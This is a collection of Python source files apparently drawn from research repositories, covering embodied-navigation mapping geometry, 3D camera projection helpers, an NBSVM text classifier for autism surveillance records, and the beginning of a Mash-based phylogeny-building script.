for k, v in aggregated_stats.items():
logger.info(f"Average episode {k}: {v:.4f}")
step_id = checkpoint_index
if "extra_state" in ckpt_dict and "step" in ckpt_dict["extra_state"]:
step_id = ckpt_dict["extra_state"]["step"]
writer.add_scalar("eval/average_reward", aggregated_stats["reward"],
step_id,
)
metrics = {k: v for k, v in aggregated_stats.items() if k != "reward"}
writer.add_scalar("eval/distance_to_currgoal", metrics["distance_to_currgoal"], step_id)
writer.add_scalar("eval/distance_to_multi_goal", metrics["distance_to_multi_goal"], step_id)
writer.add_scalar("eval/episode_length", metrics["episode_length"], step_id)
writer.add_scalar("eval/mspl", metrics["mspl"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
writer.add_scalar("eval/percentage_success", metrics["percentage_success"], step_id)
writer.add_scalar("eval/success", metrics["success"], step_id)
writer.add_scalar("eval/sub_success", metrics["sub_success"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
##Dump metrics JSON
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/metrics'):
os.mkdir(config.TENSORBOARD_DIR_EVAL +'/metrics')
with open(config.TENSORBOARD_DIR_EVAL + '/metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
json.dump(raw_metrics_episodes, fp)
# if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/traj_metrics'):
# os.mkdir(config.TENSORBOARD_DIR_EVAL +'/traj_metrics')
# with open(config.TENSORBOARD_DIR_EVAL +'/traj_metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
# json.dump(traj_metrics_episodes, fp)
self.envs.close()
```
#### File: SGoLAM/utils/geometry.py
```python
from einops import rearrange
import numpy as np
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch_scatter
"""
Code adapted from https://github.com/saimwani/multiON
"""
def get_grid(pose, grid_size, device):
"""
Input:
`pose` FloatTensor(bs, 3)
`grid_size` 4-tuple (bs, _, grid_h, grid_w)
`device` torch.device (cpu or gpu)
Output:
`rot_grid` FloatTensor(bs, grid_h, grid_w, 2)
`trans_grid` FloatTensor(bs, grid_h, grid_w, 2)
"""
pose = pose.float()
x = pose[:, 0]
y = pose[:, 1]
t = pose[:, 2]
bs = x.size(0)
cos_t = t.cos()
sin_t = t.sin()
theta11 = torch.stack([cos_t, -sin_t,
torch.zeros(cos_t.shape).float().to(device)], 1)
theta12 = torch.stack([sin_t, cos_t,
torch.zeros(cos_t.shape).float().to(device)], 1)
theta1 = torch.stack([theta11, theta12], 1)
theta21 = torch.stack([torch.ones(x.shape).to(device),
-torch.zeros(x.shape).to(device), x], 1)
theta22 = torch.stack([torch.zeros(x.shape).to(device),
torch.ones(x.shape).to(device), y], 1)
theta2 = torch.stack([theta21, theta22], 1)
rot_grid = F.affine_grid(theta1, torch.Size(grid_size))
trans_grid = F.affine_grid(theta2, torch.Size(grid_size))
return rot_grid, trans_grid
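# Illustrative usage sketch of get_grid (hypothetical pose and grid size):
#   pose = torch.tensor([[0.0, 0.0, math.pi / 2]])   # (x, y, theta) for one sample
#   rot_grid, trans_grid = get_grid(pose, (1, 1, 64, 64), torch.device("cpu"))
#   # both grids have shape (1, 64, 64, 2)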
class to_grid():
def __init__(self, global_map_size, coordinate_min, coordinate_max):
self.global_map_size = global_map_size
self.coordinate_min = coordinate_min
self.coordinate_max = coordinate_max
self.grid_size = (coordinate_max - coordinate_min) / global_map_size
def get_grid_coords(self, positions):
grid_x = ((self.coordinate_max - positions[:, 0]) / self.grid_size).floor()
grid_y = ((positions[:, 1] - self.coordinate_min) / self.grid_size).floor()
return grid_x, grid_y
def get_gps_coords(self, idx):
# H, W indices to gps coordinates
grid_x = idx[0].item()
grid_y = idx[1].item()
gps_x = self.coordinate_max - grid_x * self.grid_size
gps_y = self.coordinate_min + grid_y * self.grid_size
return gps_x, gps_y
class ComputeSpatialLocs():
def __init__(self, egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max, height_min, height_max
):
# Note: The side of one grid in egocentric map and global map is the same
self.device = device
self.cx, self.cy = 256./2., 256./2. # Hard coded camera parameters
self.fx = self.fy = (256. / 2.) / np.tan(np.deg2rad(79 / 2.))
self.egocentric_map_size = egocentric_map_size
self.local_scale = float(coordinate_max - coordinate_min)/float(global_map_size)
self.height_min, self.height_max = height_min, height_max # Minimum, maximum height values to cut off for mapping
def compute_y(self, depth):
# Returns a y-value image with the same shape as depth
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
yy = (y - self.cy) / self.fy
Z = depth
Y = yy * Z
Y = Y.permute(0, 2, 3, 1)
return Y[0].expand(Y.shape[1], Y.shape[2], 3)
def draw_range(self, depth, tgt_img, height_min, height_max):
        # Returns an image with the height range [height_min, height_max] marked in red
tgt_img = tgt_img.clone().detach()
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
yy = (y - self.cy) / self.fy
Z = depth
Y = yy * Z
Y = Y.permute(0, 2, 3, 1)
_, idx_h, idx_w, _ = torch.where((Y < height_max) & (Y > height_min))
tgt_img[0, idx_h, idx_w, :] = torch.ByteTensor([[255, 0, 0]]).to(self.device)
return tgt_img[0]
def forward(self, depth):
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
x = rearrange(torch.arange(0, imw), 'w -> () () () w').to(self.device)
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
xx = (x - self.cx) / self.fx
yy = (y - self.cy) / self.fy
# 3D real-world coordinates (in meters)
Z = depth
X = xx * Z
Y = yy * Z
# Valid inputs (depth sensor's max depth is 10m)
valid_inputs = (depth != 0) & ((Y > self.height_min) & (Y < self.height_max)) & (depth < 10.0)
# X ground projection and Y ground projection
x_gp = ( (X / self.local_scale) + (self.egocentric_map_size-1)/2).round().long() # (bs, imh, imw, 1)
y_gp = (-(Z / self.local_scale) + (self.egocentric_map_size-1)/2).round().long() # (bs, imh, imw, 1)
return torch.cat([x_gp, y_gp], dim=1), valid_inputs
class ProjectToGroundPlane():
def __init__(self, egocentric_map_size, device, scatter_mode):
self.egocentric_map_size = egocentric_map_size
self.device = device
self.scatter_mode = scatter_mode
def forward(self, img, spatial_locs, valid_inputs):
outh, outw = (self.egocentric_map_size, self.egocentric_map_size)
bs, f, HbyK, WbyK = img.shape
K = 1
# Sub-sample spatial_locs, valid_inputs according to img_feats resolution.
idxes_ss = ((torch.arange(0, HbyK, 1)*K).long().to(self.device), \
(torch.arange(0, WbyK, 1)*K).long().to(self.device))
spatial_locs_ss = spatial_locs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 2, HbyK, WbyK)
valid_inputs_ss = valid_inputs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 1, HbyK, WbyK)
valid_inputs_ss = valid_inputs_ss.squeeze(1) # (bs, HbyK, WbyK)
invalid_inputs_ss = ~valid_inputs_ss
# Filter out invalid spatial locations
invalid_spatial_locs = (spatial_locs_ss[:, 1] >= outh) | (spatial_locs_ss[:, 1] < 0 ) | \
(spatial_locs_ss[:, 0] >= outw) | (spatial_locs_ss[:, 0] < 0 ) # (bs, H, W)
invalid_writes = invalid_spatial_locs | invalid_inputs_ss
# Set the idxes for all invalid locations to (0, 0)
spatial_locs_ss[:, 0][invalid_writes] = 0
spatial_locs_ss[:, 1][invalid_writes] = 0
# Linearize ground-plane indices (linear idx = y * W + x)
linear_locs_ss = spatial_locs_ss[:, 1] * outw + spatial_locs_ss[:, 0] # (bs, H, W)
linear_locs_ss = rearrange(linear_locs_ss, 'b h w -> b () (h w)')
linear_locs_ss = linear_locs_ss.expand(-1, f, -1) # .contiguous()
linear_locs_ss = linear_locs_ss[..., ~invalid_writes.reshape(-1)]
tgt_img = img.reshape(1, f, -1)[..., ~invalid_writes.reshape(-1)]
if self.scatter_mode == 'max':
proj_feats, _ = torch_scatter.scatter_max(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
elif self.scatter_mode == 'min':
proj_feats, _ = torch_scatter.scatter_min(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
elif self.scatter_mode == 'mean':
proj_feats = torch_scatter.scatter_mean(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
else:
raise ValueError("Invalid scatter mode!")
proj_feats = rearrange(proj_feats, 'b e (h w) -> b e h w', h=outh)
return proj_feats
class RotateTensor:
def __init__(self, device):
self.device = device
def forward(self, x_gp, heading):
sin_t = torch.sin(heading.squeeze(1))
cos_t = torch.cos(heading.squeeze(1))
A = torch.zeros(x_gp.size(0), 2, 3).to(self.device)
A[:, 0, 0] = cos_t
A[:, 0, 1] = sin_t
A[:, 1, 0] = -sin_t
A[:, 1, 1] = cos_t
grid = F.affine_grid(A, x_gp.size())
rotated_x_gp = F.grid_sample(x_gp, grid)
return rotated_x_gp
class Projection:
def __init__(self, egocentric_map_size, global_map_size, device, coordinate_min, coordinate_max, height_min, height_max, scatter_mode):
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.compute_spatial_locs = ComputeSpatialLocs(egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max, height_min, height_max
)
self.project_to_ground_plane = ProjectToGroundPlane(egocentric_map_size, device, scatter_mode)
self.rotate_tensor = RotateTensor(device)
def forward(self, img, depth, heading):
spatial_locs, valid_inputs = self.compute_spatial_locs.forward(depth)
x_gp = self.project_to_ground_plane.forward(img, spatial_locs, valid_inputs)
rotated_x_gp = self.rotate_tensor.forward(x_gp, heading)
return rotated_x_gp
class Registration:
def __init__(self, egocentric_map_size, global_map_size, global_map_depth, device, coordinate_min, coordinate_max, num_obs):
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.global_map_depth = global_map_depth
self.device = device
self.to_grid = to_grid(global_map_size, coordinate_min, coordinate_max)
self.num_obs = num_obs
def forward(self, observations, full_global_map, egocentric_map):
"""
Register egocentric_map to full_global_map
Args:
observations: Dictionary containing habitat observations
full_global_map: (self.num_obs, self.global_map_size, self.global_map_size, self.global_map_depth) torch.tensor containing global map
            egocentric_map: (self.num_obs, self.egocentric_map_size, self.egocentric_map_size, self.global_map_depth) torch.tensor containing egocentric map
Returns:
registered_map: (self.num_obs, self.global_map_size, self.global_map_size, self.global_map_depth) torch.tensor containing registered map
"""
grid_x, grid_y = self.to_grid.get_grid_coords(observations['gps'])
if torch.cuda.is_available():
with torch.cuda.device(self.device):
agent_view = torch.cuda.FloatTensor(self.num_obs, self.global_map_depth, self.global_map_size, self.global_map_size).fill_(0)
else:
agent_view = torch.FloatTensor(self.num_obs, self.global_map_depth, self.global_map_size, self.global_map_size).to(self.device).fill_(0)
agent_view[:, :,
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2),
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2)
] = egocentric_map
st_pose = torch.cat(
[-(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
-(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
observations['compass']],
dim=1
)
rot_mat, trans_mat = get_grid(st_pose, agent_view.size(), self.device)
rotated = F.grid_sample(agent_view, rot_mat)
translated = F.grid_sample(rotated, trans_mat)
registered_map = torch.max(full_global_map, translated.permute(0, 2, 3, 1))
return registered_map
class GlobalMap2World:
# TODO: Needs testing
# Class for converting global map indices to world coordinates
def __init__(self, orig_position, orig_rot, grid_mapper: to_grid):
self.device = orig_position.device
self.orig_position = orig_position # (3, ) torch tensor containing agent start position
self.orig_rot = orig_rot # (1, ) torch.tensor containing agent start rotation
self.rot_mat = torch.tensor([[math.cos(orig_rot), -math.sin(orig_rot)], [math.sin(orig_rot), math.cos(orig_rot)]], device=self.device)
self.grid_mapper = grid_mapper # Maps GPS coordinate to indices
def convert(self, global_map_idx):
# Global map to world position
gps_x, gps_y = self.grid_mapper.get_gps_coords(global_map_idx)
gps_tmp = self.rot_mat.T @ torch.tensor([[gps_x], [gps_y]])
return torch.tensor([gps_tmp[0], self.orig_position[1], gps_tmp[-1]])
def inv_convert(self, world_position):
# World position to global map index
import pdb; pdb.set_trace()
gps_world_position = (world_position - self.orig_position) # (2, ) torch tensor containing agent-centric position
gps_world_position = torch.tensor([[gps_world_position[0, 0]], [gps_world_position[0, 2]]], device=self.device)
gps_world_position = (self.rot_mat @ gps_world_position).T # (1, 2)
grid_x, grid_y = self.grid_mapper.get_grid_coords(gps_world_position)
return grid_x.long().item(), grid_y.long().item()
```
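The `to_grid` helper above converts between GPS-style metric coordinates and global-map grid indices. A minimal round-trip sketch, assuming the file is importable as `geometry`; the map size, coordinate bounds, and positions below are illustrative, not values taken from the project configs:
```python
import torch
from geometry import to_grid  # assumes the module above is on the import path as geometry.py

# Hypothetical map: 275x275 cells spanning [-110 m, 110 m], so one cell is 0.8 m wide.
mapper = to_grid(global_map_size=275, coordinate_min=-110.0, coordinate_max=110.0)

positions = torch.tensor([[1.5, -1.9]])      # one (x, y) GPS-style position
grid_x, grid_y = mapper.get_grid_coords(positions)
print(grid_x, grid_y)                        # tensor([135.]) tensor([135.])

# Back from grid indices to coordinates (quantised to the 0.8 m cell size):
gps_x, gps_y = mapper.get_gps_coords((grid_x[0], grid_y[0]))
print(round(gps_x, 3), round(gps_y, 3))      # approx. 2.0 and -2.0
```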
#### File: SGoLAM/utils/visualize.py
```python
import matplotlib.pyplot as plt
import numpy as np
def debug_visualize(tgt_tensor):
"""
Visualize target tensor. If batch dimension exists, visualizes the first instance. Multi-channel inputs are shown as 'slices'.
If number of channels is 3, displayed in RGB. Otherwise results are shown as single channel images.
For inputs that are float, we assume that the tgt_tensor values are normalized within [0, 1].
For inputs that are int, we assume that the tgt_tensor values are normalized within [0, 255].
Args:
tgt_tensor: torch.tensor with one of the following shapes: (H, W), (H, W, C), (B, H, W, C)
Returns:
None
"""
if "torch" in str(type(tgt_tensor)):
vis_tgt = tgt_tensor.cpu().float().numpy()
elif "numpy" in str(type(tgt_tensor)):
        vis_tgt = tgt_tensor.astype(float)  # builtin float; np.float is a removed alias
else:
raise ValueError("Invalid input!")
if vis_tgt.max() > 2.0: # If tgt_tensor is in range greater than 2.0, we assume it is an RGB image
vis_tgt /= 255.
if len(vis_tgt.shape) == 2:
H, W = vis_tgt.shape
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
elif len(vis_tgt.shape) == 3:
H, W, C = vis_tgt.shape
if C > 3 or C == 2:
fig = plt.figure(figsize=(50, 50))
for i in range(C):
fig.add_subplot(C // 2, 2, i + 1)
plt.imshow(vis_tgt[..., i], cmap='gray', vmin=vis_tgt[..., i].min(), vmax=vis_tgt[..., i].max())
elif C == 3: # Display as RGB
plt.imshow(vis_tgt)
elif C == 1:
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
elif len(vis_tgt.shape) == 4:
B, H, W, C = vis_tgt.shape
vis_tgt = vis_tgt[0]
if C > 3 or C == 2:
fig = plt.figure(figsize=(50, 50))
for i in range(C):
fig.add_subplot(C // 2, 2, i + 1)
plt.imshow(vis_tgt[..., i], cmap='gray', vmin=vis_tgt[..., i].min(), vmax=vis_tgt[..., i].max())
elif C == 3: # Display as RGB
plt.imshow(vis_tgt)
elif C == 1:
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
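# Illustrative calls (hypothetical tensors; torch.rand values lie in [0, 1]):
#   debug_visualize(torch.rand(64, 64))          # 2-D input, shown in grayscale
#   debug_visualize(torch.rand(64, 64, 3))       # 3 channels, shown as an RGB image
#   debug_visualize(torch.rand(2, 64, 64, 4))    # batched, 4 channels: first sample shown as a 2x2 grid of slices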
``` |
{
"source": "82magnolia/Structured3D",
"score": 2
} |
#### File: Structured3D/misc/utils.py
```python
import numpy as np
def normalize(vector):
return vector / np.linalg.norm(vector)
def parse_camera_info(camera_info, height, width):
""" extract intrinsic and extrinsic matrix
"""
lookat = normalize(camera_info[3:6])
up = normalize(camera_info[6:9])
W = lookat
U = np.cross(W, up)
V = -np.cross(W, U)
rot = np.vstack((U, V, W))
trans = camera_info[:3]
xfov = camera_info[9]
yfov = camera_info[10]
K = np.diag([1, 1, 1])
K[0, 2] = width / 2
K[1, 2] = height / 2
K[0, 0] = K[0, 2] / np.tan(xfov)
K[1, 1] = K[1, 2] / np.tan(yfov)
return rot, trans, K
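# Illustrative call (hypothetical values); the camera_info vector is assumed to be laid out as
# [tx, ty, tz, lookat_x, lookat_y, lookat_z, up_x, up_y, up_z, xfov, yfov], with the FOVs
# being half-angles in radians as implied by the np.tan() calls above:
#   camera_info = np.array([0.0, 0.0, 1600.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.68, 0.47])
#   rot, trans, K = parse_camera_info(camera_info, height=720, width=1280)
#   # rot stacks the derived camera basis vectors as rows, trans is the camera position,
#   # and K is the pinhole intrinsic matrix with principal point (640, 360).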
def flip_towards_viewer(normals, points):
points = points / np.linalg.norm(points)
proj = points.dot(normals[:2, :].T)
flip = np.where(proj > 0)
normals[flip, :] = -normals[flip, :]
return normals
def get_corners_of_bb3d(basis, coeffs, centroid):
corners = np.zeros((8, 3))
# order the basis
index = np.argsort(np.abs(basis[:, 0]))[::-1]
    # handle ties, i.e. the case where two values with the same magnitude appear at the same time
if index[2] != 2:
index[1:] = index[1:][::-1]
basis = basis[index, :]
coeffs = coeffs[index]
    # Now the basis vectors are ordered X, Y, Z. Next, flip the basis vectors towards the viewer
basis = flip_towards_viewer(basis, centroid)
coeffs = np.abs(coeffs)
corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[2, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[3, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[6, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[7, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners = corners + np.tile(centroid, (8, 1))
return corners
def get_corners_of_bb3d_no_index(basis, coeffs, centroid):
corners = np.zeros((8, 3))
coeffs = np.abs(coeffs)
corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[2, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[3, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[6, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[7, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners = corners + np.tile(centroid, (8, 1))
return corners
def project_3d_points_to_2d(points3d, R_ex, K):
"""
Project 3d points from camera-centered coordinate to 2D image plane
Parameters
----------
points3d: numpy array
3d location of point
R_ex: numpy array
extrinsic camera parameter
K: numpy array
intrinsic camera parameter
Returns
-------
points2d: numpy array
2d location of the point
"""
points3d = R_ex.dot(points3d.T).T
x3 = points3d[:, 0]
y3 = -points3d[:, 1]
z3 = np.abs(points3d[:, 2])
xx = x3 * K[0, 0] / z3 + K[0, 2]
yy = y3 * K[1, 1] / z3 + K[1, 2]
points2d = np.vstack((xx, yy))
return points2d
def project_struct_bdb_to_2d(basis, coeffs, center, R_ex, K):
"""
Project 3d bounding box to 2d bounding box
Parameters
----------
basis, coeffs, center, R_ex, K
: K is the intrinsic camera parameter matrix
: Rtilt is the extrinsic camera parameter matrix in right hand coordinates
Returns
-------
bdb2d: dict
Keys: {'x1', 'x2', 'y1', 'y2'}
The (x1, y1) position is at the top left corner,
the (x2, y2) position is at the bottom right corner
"""
corners3d = get_corners_of_bb3d(basis, coeffs, center)
corners = project_3d_points_to_2d(corners3d, R_ex, K)
bdb2d = dict()
bdb2d['x1'] = int(max(np.min(corners[0, :]), 1)) # x1
bdb2d['y1'] = int(max(np.min(corners[1, :]), 1)) # y1
bdb2d['x2'] = int(min(np.max(corners[0, :]), 2*K[0, 2])) # x2
bdb2d['y2'] = int(min(np.max(corners[1, :]), 2*K[1, 2])) # y2
# if not check_bdb(bdb2d, 2*K[0, 2], 2*K[1, 2]):
# bdb2d = None
return bdb2d
``` |
{
"source": "82ndAirborneDiv/autism_surveillance",
"score": 2
} |
#### File: autism_surveillance/src/nbsvm.py
```python
import numpy as np
import pandas as pd
import GPy, GPyOpt
from sklearn.model_selection import train_test_split
from sklearn.metrics import brier_score_loss as brier_score
from sklearn.metrics import accuracy_score, f1_score
from scipy.sparse import load_npz
from stuff.models import NBSVM, simpleNBSVM
from stuff.tools import tfidf_to_counts
from stuff.metrics import binary_diagnostics
# Importing the data
filedir = 'C:/data/addm/'
seeds = np.array(pd.read_csv(filedir + 'seeds.csv')).flatten()
corpus = pd.read_csv(filedir + 'corpus_with_lemmas_clean.csv')
doctermat = load_npz(filedir + 'doctermat.npz')
# Setting the features and targets
X = tfidf_to_counts(np.array(doctermat.todense(),
dtype=np.uint16))
y = np.array(corpus.aucaseyn, dtype=np.uint8)
n_range = range(corpus.shape[0])
# Toggle for the optimization loop
optimize = False
opt_iter = 30
if optimize:
# Regular function for hyperparameter evaluation
def evaluate_hps(beta, C):
mod = NBSVM(C=C, beta=beta)
mod.fit(X[train], y[train])
guesses = mod.predict(X[val]).flatten()
final_score = 1 - accuracy_score(y[val], guesses)
params = np.array([beta, C])
print('Params were ' + str(params))
print('Error was ' + str(final_score) + '\n')
return final_score
# Bounds for the GP optimizer
bounds = [{'name': 'beta',
'type': 'continuous',
'domain': (0.8, 1.0)},
{'name': 'C',
'type': 'discrete',
'domain': (0.001, 0.01, 1.0, 2, 2**2)}
]
# Function for GPyOpt to optimize
def f(x):
print(x)
eval = evaluate_hps(beta=float(x[:, 0]),
C=float(x[:, 1]))
return eval
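    # GPyOpt calls f with a 2-D array holding one candidate per row, ordered as in
    # `bounds`; e.g. (hypothetical point) x = np.array([[0.9, 1.0]]) maps to
    # evaluate_hps(beta=0.9, C=1.0).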
# Running the optimization
train, val = train_test_split(n_range,
test_size=0.3,
stratify=y,
random_state=10221983)
opt_mod = GPyOpt.methods.BayesianOptimization(f=f,
num_cores=20,
domain=bounds,
initial_design_numdata=5)
opt_mod.run_optimization(opt_iter)
best = opt_mod.x_opt
# Saving the best parameters to CSV
pd.Series(best).to_csv(filedir + 'models/best_nbsvm_params.csv',
index=False)
# Running the splits
stats = pd.DataFrame(np.zeros([10, 15]))
for i, seed in enumerate(seeds):
train, test = train_test_split(n_range,
stratify=y,
random_state=seed,
test_size=0.3)
if i == 0:
test_guesses = pd.DataFrame(np.zeros([X[test].shape[0], 10]))
# Fitting the model
mod = simpleNBSVM(C=0.001)
print('Fitting model ' + str(i))
mod.fit(X[train], y[train])
# Getting the predicted probs and thresholded guesses
guesses = mod.predict(X[test]).flatten()
test_guesses.iloc[:, i] = guesses
bin_stats = binary_diagnostics(y[test], guesses, accuracy=True)
print(bin_stats)
stats.iloc[i, :] = bin_stats.values
# Writing the output to CSV
stats.columns = ['tp', 'fp', 'tn', 'fn', 'sens', 'spec', 'ppv', 'npv',
'f1', 'acc', 'true', 'pred', 'abs', 'rel', 'mcnemar']
stats.to_csv(filedir + 'stats/nbsvm_simple_stats.csv',
index=False)
test_guesses.to_csv(filedir + 'guesses/nbsvm_simple_test_guesses.csv',
index=False)
``` |
{
"source": "82ndAirborneDiv/BMGAP",
"score": 2
} |
#### File: data-api/phylo_tree_scripts/build_phylo.py
```python
import sys
from Bio import SeqIO
from Bio.Phylo.TreeConstruction import DistanceCalculator
from Bio.Phylo.TreeConstruction import _DistanceMatrix
from Bio.Phylo.TreeConstruction import DistanceTreeConstructor
from Bio import Phylo
import os
import string
import re
import operator
import csv
import pprint as pp
import locale
import argparse
import datetime
import json
import time
import shutil
import math
import collections
import urllib3
from multiprocessing import Pool,Process, Queue
import tempfile
import sqlite3
from random import randint
from subprocess import *
from scipy import stats
import numpy as np
from operator import attrgetter
#import matplotlib.pyplot as plt
encoding = locale.getdefaultlocale()[1]
http = urllib3.PoolManager()
##PATHS###
SCRIPT_PATH = os.path.realpath(__file__)
DIR_PATH = os.path.dirname(SCRIPT_PATH)
home_dir = os.path.expanduser("~")
mask_map_script = "{}/ML/tools/mask_mapped_aln/mask_mapped_aln.py".format(home_dir)
adjust_size_script = "{}/ML/tools/mask_mapped_aln/adjust_partition_size.py".format(home_dir)
pacbio_ref_sketch = "{}/ML/Projects/NadavTopaz/Scripts/lib/pacbio_references.msh".format(home_dir)
reference_files = "{}/ML/Projects/NadavTopaz/Scripts/reference_pacbios".format(home_dir)
#GENOME_DIR = "{}/ML/Projects/NadavTopaz/All_nm/fastas".format(home_dir)
# print(home_dir)
# print(mask_map_script)
# print(GENOME_DIR)
# print(adjust_size_script)
OUTPUT_DIR = ""
VERBOSITY = False
weights = {"1":1.0,
"2":0,
"3":0}
fasta_extensions = [".fa",".fasta",".fna"]
def set_output(output):
global OUTPUT_DIR
OUTPUT_DIR = output
if os.path.isdir(output):
        print("Output Directory",output,"already exists, not creating")
else:
os.system("mkdir {}".format(output))
print("Created Output Directory",output)
def pick_reference(query_sketch,threads):
mash_results = check_output(["mash","dist","-p",threads,pacbio_ref_sketch,query_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
current_min = 100.0
current_ref = ""
for line in mash_result:
line = line.decode(encoding)
ref_assembly = line.split("\t")[0]
query_name = line.split("\t")[1]
mash_dist = float(line.split("\t")[2])
if mash_dist < current_min:
current_min = mash_dist
current_ref = ref_assembly
ref_path = os.path.join(reference_files,current_ref)
return ref_path
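# Each line of `mash dist` output is tab-separated as
#   reference-ID  query-ID  distance  p-value  shared-hashes
# e.g. (illustrative) "ref1.fasta\tquery1.fasta\t0.0123\t0.0\t850/1000",
# which is why fields [0], [1] and [2] are parsed above and below.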
def pick_genomes(query_sketch,mash_db,threads,max_num,force_max):
print("Calculating Distances")
mash_results_dict = {}
mash_results = check_output(["mash","dist","-p",threads,mash_db,query_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
seen_basenames = []
counts = {}
for line in mash_result:
query_name = line.decode(encoding).split("\t")[1]
query_name = os.path.basename(query_name)
if query_name not in mash_results_dict:
mash_results_dict[query_name] = {"mash_results":{},"mash_dists":[]}
hit = line.decode(encoding).split("\t")[0]
if "/" in hit:
hit_path = hit
hit = os.path.basename(hit)
if "_" in hit:
hit_basename = hit.split("_")[0]
else:
hit_basename = hit
if "_" in query_name:
query_basename = query_name.split("_")[0]
if query_basename == hit_basename:
continue
if query_name == hit:
continue
mash_dist = float(line.decode(encoding).split("\t")[2])
p_val = line.decode(encoding).split("\t")[3]
match_hash = line.decode(encoding).split("\t")[4]
mash_score = mash_dist
mash_results_dict[query_name]["mash_results"][hit] = {"score":mash_score,"p_val":p_val,"hash":match_hash,"hit":hit,"path":hit_path}
mash_results_dict[query_name]["mash_dists"].append(mash_score)
final_genomes = {"all_genomes":[],"details":{}}
for query in mash_results_dict:
scores_set = []
for hit,_ in sorted(mash_results_dict[query]["mash_results"].items(),key=lambda x: float(x[1]["score"])):
score = mash_results_dict[query]["mash_results"][hit]["score"]
if score not in scores_set:
scores_set.append(score)
a = np.asarray(scores_set)
count = 0
for hit,_ in sorted(mash_results_dict[query]["mash_results"].items(),key=lambda x: float(x[1]["score"])):
if hit not in final_genomes["all_genomes"]:
score = mash_results_dict[query]["mash_results"][hit]["score"]
if count < max_num:
hit_path = mash_results_dict[query]["mash_results"][hit]["path"]
final_genomes["all_genomes"].append(hit_path)
final_genomes["details"][hit] = {"query":query,"dist":score}
count+=1
print(final_genomes["all_genomes"])
print(len(final_genomes["all_genomes"]))
final_scores = []
for query in mash_results_dict:
for genome in final_genomes["details"]:
score = mash_results_dict[query]["mash_results"][genome]["score"]
final_scores.append(score)
#print(genome,score)
#print(sorted(final_scores))
#~ plt.savefig("hist.svg",format="svg")
#final_genomes["query"] = query_name
return final_genomes
def mash_sketch(threads,genome_dir,temp_dir,sketch_info):
print("Running Mash")
threads = threads
kmer_size = 32
sketch_size = 10000
sketch_info_dict = {}
call(["mash sketch -k {} -p {} -s {} -o {} {}/*".format(kmer_size,threads,sketch_size,os.path.join(temp_dir,"nm_sketch"),genome_dir)], shell=True)
sketch_info_dict["path"] = temp_dir+"/nm_sketch.msh"
